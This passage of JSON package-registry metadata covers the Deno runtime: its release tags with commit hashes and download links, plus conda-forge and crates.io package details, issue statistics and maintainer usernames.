osyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T02:24:46.138Z","dependent_packages_count":2,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":34.025455452957324,"dependent_packages_count":19.505864736710755,"stargazers_count":0.06987771400049912,"forks_count":1.3975542800099825,"average":13.74968804591964},"purl":"pkg:conda/deno?repository_url=https://conda-forge.org","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/conda/deno","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/conda/deno","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/conda/deno/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/deno/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/deno/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/deno/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/deno/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/deno/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/deno/codemeta","maintainers":[],"registry":{"name":"conda-forge.org","url":"https://conda-forge.org","ecosystem":"conda","default":false,"packages_count":20636,"maintainers_count":0,"namespaces_count":0,"keywords_count":13549,"github":"conda-forge","metadata":{"kind":"conda-forge","key":"CondaForge","api":"https://conda.anaconda.org","funded_packages_count":2368},"icon_url":"https://github.com/conda-forge.png","created_at":"2022-10-03T15:37:08.743Z","updated_at":"2026-09-01T05:06:11.122Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/namespaces"}},{"id":11066817,"name":"deno_lib","ecosystem":"cargo","description":"Shared code between the Deno CLI and denort","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":83,"first_release_published_at":"2024-11-20T07:50:02.859Z","latest_release_published_at":"2025-04-30T10:54:18.966Z","latest_release_number":"2.3.1","last_synced_at":"2026-08-29T21:57:47.776Z","created_at":"2024-11-20T08:01:03.803Z","updated_at":"2026-08-29T21:57:47.777Z","registry_url":"https://crates.io/crates/deno_lib/","install_command":"cargo install deno_lib","documentation_url":"https://docs.rs/deno_lib/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_n